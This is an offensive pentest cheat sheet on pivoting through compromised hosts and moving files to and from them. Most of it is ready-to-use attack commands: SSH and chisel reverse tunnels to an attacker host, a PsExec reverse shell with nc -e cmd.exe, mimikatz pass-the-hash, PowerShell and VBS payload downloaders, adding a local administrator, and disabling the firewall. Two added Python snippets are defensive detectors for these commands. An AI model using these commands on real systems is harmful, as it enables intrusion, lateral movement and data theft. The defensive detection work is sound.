- Local Port forwarding
- Remote port forwarding
- Socks Proxy
- Other tunneling options
- File Transfers
- Misc
- Connects a local port to the target port on the target IP.
- Useful, for example, when a database server is listening on localhost on the target and you want to connect to it from your Kali box.
ssh -N -L <LOCAL PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<TARGET IP>
- Opens a local port on your Kali box (BIND_ADDRESS) and connects it to the target IP and port via a hop.
- Useful, for example, when you have compromised one host that can reach another host running MSSQL and you want to connect from Kali to that MSSQL service.
ssh -N -L <BIND_ADDRESS>:<LOCAL PORT>:<TARGET IP>:<TARGET PORT> <USERNAME>@<HOP IP>
- Opens a port on the local IP and port and sends all traffic to the target IP and port.
- Useful for opening a port on the hop to receive shells back through.
- Useful, for example, when you have compromised one host that can reach another host running MSSQL and you want to connect from Kali to that MSSQL service.
netsh interface portproxy add v4tov4 listenaddress=<LOCAL IP> listenport=<LOCAL PORT> connectaddress=<TARGET IP> connectport=<TARGET PORT> protocol=tcp
netsh interface portproxy show v4tov4
netsh interface portproxy delete v4tov4 listenaddress=<IP> listenport=<PORT>
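From the defender's side, the portproxy rules set with the commands above are what an audit should look for. The following is an added example (not part of the original notes) that parses the text printed by `netsh interface portproxy show v4tov4` and reports the rules that relay traffic to another host; the sample output is constructed in the layout netsh prints.

```python
"""Audit the Windows portproxy rules set with the netsh commands above.

Added defender-side example, not part of the original notes: parses the text
printed by `netsh interface portproxy show v4tov4` and reports rules that relay
traffic to another host, which is the pivot pattern described above.
"""
import ipaddress
import re

# Constructed sample output in the layout netsh prints (not captured from a host).
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
*               4444        10.10.10.25     1433
127.0.0.1       8080        127.0.0.1       8000
0.0.0.0         3390        192.168.50.7    3389
"""

ROW_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(text):
    """Return one dict per v4tov4 rule found in the netsh output."""
    rules, in_table = [], False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("-----"):
            in_table = True            # separator line: data rows follow
            continue
        m = ROW_RE.match(line) if in_table and line else None
        if m:
            rules.append({"listen_addr": m.group(1), "listen_port": int(m.group(2)),
                          "connect_addr": m.group(3), "connect_port": int(m.group(4))})
    return rules


def is_relay(rule):
    """True when the rule forwards to another host rather than loopback."""
    try:
        return not ipaddress.ip_address(rule["connect_addr"]).is_loopback
    except ValueError:
        return True                    # a hostname: cannot prove it is local


def relays(text):
    """Off-host forwarders, sorted by listening port (the pivots to review)."""
    return sorted((r for r in parse_portproxy(text) if is_relay(r)),
                  key=lambda r: r["listen_port"])
```

The same rules live under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, so a persistent forwarder survives reboots and is worth checking there as well.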
- https://netcologne.dl.sourceforge.net/project/unix-utils/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip
- Download all DLLs and the executable to the target
- Opens a port on the local IP and port and sends all traffic to the target IP and port.
- Useful for opening a port on the hop to receive shells back through.
- Useful, for example, when you have compromised one host that can reach another host running MSSQL and you want to connect from Kali to that MSSQL service.
socat.exe tcp-listen:<LISTENING PORT>,fork tcp-connect:<TARGET IP>:<TARGET PORT>
- The same relay on Linux, so that we can connect with our Windows tools, for example:
socat tcp-l:<LISTENING PORT>,fork tcp:<TARGET IP TO SEND IT TO (FIRST HOP)>:<TARGET PORT>
- Forward a local port of the target back to our Kali
- Connects a local port of the target back to our Kali box.
- Useful, for example, when a database server is listening on localhost on the target and you want to connect to it from your Kali box.
ssh -N -R <BIND_ADDRESS>:<PORT>:127.0.0.1:<TARGET PORT> <USERNAME>@<ATTACKER IP>
plink.exe <USER>@<IP> -R <ATTACKER PORT>:<TARGET IP>:<TARGET PORT>
sudo ssh -N -D 127.0.0.1:9000 <username>@<IP>
ssh -J <USER>@<FIRST HOP IP> -D 127.0.0.1:9000 <USER>@<SECOND IP>
/opt/chisel/chisel server -p 443 --socks5 --reverse
./chisel.exe client <ATTACKER IP>:443 R:socks
- For Linux
- Edit the proxychains config and add a line for your SOCKS proxy (user and password only if the proxy requires them):
sudo vim /etc/proxychains.conf
socks5 <IP> <PORT> <USER> <PASS>
proxychains <COMMAND>
- https://www.proxifier.com/
- For Windows
- Open Proxifier, go to Profile -> Proxy Servers and Add a new proxy entry, which will point at the IP address and Port of your Cobalt Strike SOCKS proxy.
- Next, go to Profile -> Proxification Rules. This is where you can add rules that tell Proxifier when and where to proxy specific applications. Multiple applications can be added to the same rule, but in this example, I'm creating a single rule for adexplorer64.exe (part of the Sysinternals Suite).
- Target hosts: fill in the target internal network range, with the action
proxy socks <TARGET>
- NOTE: You will also need to add a static host entry in C:\Windows\System32\drivers\etc\hosts:
<DC IP> <DOMAIN>
- You can enable DNS lookups through Proxifier, but that will cause DNS leaks from your computer into the target environment.
runas /netonly /user:<DOMAIN>\<USER> "C:\windows\system32\mmc.exe C:\windows\system32\dsa.msc"
sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:"C:\windows\system32\mmc.exe C:\windows\system32\dsa.msc"
- Install FoxyProxy https://getfoxyproxy.org/
- Configure Proxy IP and port, Username and Password.
- NTLM auth: https://offensivedefence.co.uk/posts/ntlm-auth-firefox/
sshuttle -r <USERNAME>@<TARGET> <RANGE(s) TO TUNNEL> --ssh-cmd 'ssh -i /home/user/Offshore/id_rsa_root_nix01'
sshuttle -r <USERNAME>@<TARGET> <RANGE(s) TO TUNNEL>
sudo service apache2 start #files in /var/www/html
sudo python3 -m http.server <PORT> #files in current directory
sudo python2 -m SimpleHTTPServer <PORT>
sudo php -S 0.0.0.0:<PORT>
sudo ruby -run -e httpd . -p <PORT>
sudo busybox httpd -f -p <PORT>
wget http://<IP>:<PORT>/<FILE>
sudo python3 /opt/oscp/impacket/examples/smbserver.py <SHARE NAME> <PATH>
dir \\<IP>\<SHARE NAME>
copy \\<IP>\<SHARE NAME>\<FILE NAME> <FILE>
copy \\<IP>\<SHARE NAME>\<FILE NAME>\*.* .
copy <FILE> \\<IP>\<SHARE NAME>\<FILE NAME>
If installed, use the ftp client.
Use the native ftp.exe with the -s parameter to read the commands from an input file (note the space before the redirect on the first line: cmd.exe otherwise treats the trailing 1 of 21 as a handle number and drops it from the port).
echo open 192.168.119.124 21 > ftp.txt
echo USER offsec>> ftp.txt
echo lab>> ftp.txt
echo bin >> ftp.txt
echo GET accesschk.exe >> ftp.txt
echo GET winPEASany.exe >> ftp.txt
echo quit >> ftp.txt
ftp -v -n -s:ftp.txt
python -m pyftpdlib 21
ftp <IP>
Create the VBS script:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Run the VBS script to download the file:
cscript wget.vbs http://<IP>/<FILE> <FILE>
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/<FILE>', '<FILE>')
powershell -c "Invoke-WebRequest -Uri 'http://<IP>/<FILE>' -OutFile 'C:\Windows\Temp\<FILE>'"
nc -nlvp <PORT> > <FILE>
nc -nv <IP> <PORT> < <FILE>
sudo socat TCP4-LISTEN:<PORT>,fork file:<FILE>
socat TCP4:<IP>:<PORT> file:<FILE>,create
powercat -c <IP> -p <PORT> -i <FILE>
Create /var/www/upload.php on Kali:
<?php
$uploaddir = '/var/www/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile);
?>
Upload the file from the Windows client:
powershell (New-Object System.Net.WebClient).UploadFile('http://<IP>/upload.php', '<FILE>')
Install a TFTP server on Kali:
sudo apt update && sudo apt install atftp
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
On the Windows client, to send a file:
tftp -i <IP> put important.docx
powercat -c <IP> -p <PORT> -i <FILE>
Get a shell back to my machine as another user using netcat:
PsExec.exe -u <COMPUTERNAME>\<USERNAME> -p <PASSWORD> \\<COMPUTERNAME> nc.exe <ATTACKER IP> <ATTACKER PORT> -e cmd.exe
#Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
#Enable more than one concurrent user login
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
#Add user to RDP group
net user <USER> <PASS> /add /Y
net localgroup administrators <USER> /add
net localgroup "Remote Desktop Users" <USER> /add
#Disable firewall
netsh advfirewall set allprofiles state off
#RDP to machine
xfreerdp /u:<USER> /p:<PASS> /v:<TARGET>
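Every step in the sequence above (portproxy forwarders, socat relays, reverse tunnel clients, the fDenyTSConnections registry change, the firewall being switched off, an account added to Remote Desktop Users) leaves a distinctive process command line. The following is an added defender-side example, not part of these notes, that flags those command lines in process-creation telemetry; the events, host names and users are constructed.

```python
"""Flag the tunnelling, RDP-enabling and firewall-disabling commands from these
notes in process-creation telemetry (Sysmon Event 1 / Security 4688 command lines).
Added defender-side example, not part of the original notes; events are constructed."""
import re

# (rule name, pattern over the full command line); all case-insensitive.
RULES = [
    ("portproxy_forwarder", re.compile(r"netsh\s+interface\s+portproxy\s+add\b", re.I)),
    ("socat_relay", re.compile(r"\bsocat(\.exe)?\s+tcp-l(isten)?:\d+", re.I)),
    ("reverse_tunnel_client",
     re.compile(r"\bchisel(\.exe)?\s+client\b|\b(plink(\.exe)?|ssh)\s.*\s-R\s", re.I)),
    ("rdp_enabled_via_registry",
     re.compile(r"fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I)),
    ("firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b", re.I)),
    ("rdp_group_member_added",
     re.compile(r'net\s+localgroup\s+"?remote desktop users"?\s+\S+\s+/add\b', re.I)),
]

# Constructed sample events (host, user, command line); not real telemetry.
EVENTS = [
    ("WS01", r"CORP\jdoe", "netsh interface show interface"),
    ("WS01", r"CORP\jdoe", "netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 "
     "listenport=4444 connectaddress=10.10.10.25 connectport=1433 protocol=tcp"),
    ("SRV02", r"NT AUTHORITY\SYSTEM", r'reg query "HKLM\SYSTEM\CurrentControlSet\Control'
     r'\Terminal Server" /v fDenyTSConnections'),
    ("SRV02", r"CORP\svc_backup", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control'
     r'\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("SRV02", r"CORP\svc_backup", "netsh advfirewall set allprofiles state off"),
    ("SRV02", r"CORP\svc_backup", 'net localgroup "Remote Desktop Users" svc_backup /add'),
    ("WS03", r"CORP\asmith", "chisel.exe client 203.0.113.5:443 R:socks"),
]

def classify(cmdline):
    """Names of every rule the command line matches (empty list if benign)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """(host, user, rule) per match; several rules on one host in a short
    window is the sequence these notes walk through."""
    return [(host, user, rule) for host, user, cmd in events for rule in classify(cmd)]

def hosts_by_distinct_rules(events):
    """Hosts ranked by how many distinct rules fired, most first."""
    seen = {}
    for host, _, rule in scan(events):
        seen.setdefault(host, set()).add(rule)
    return sorted(((h, len(r)) for h, r in seen.items()), key=lambda x: -x[1])
```

A read-only `reg query` of the same value does not fire, so the rules key on the write, not on anyone looking at the setting.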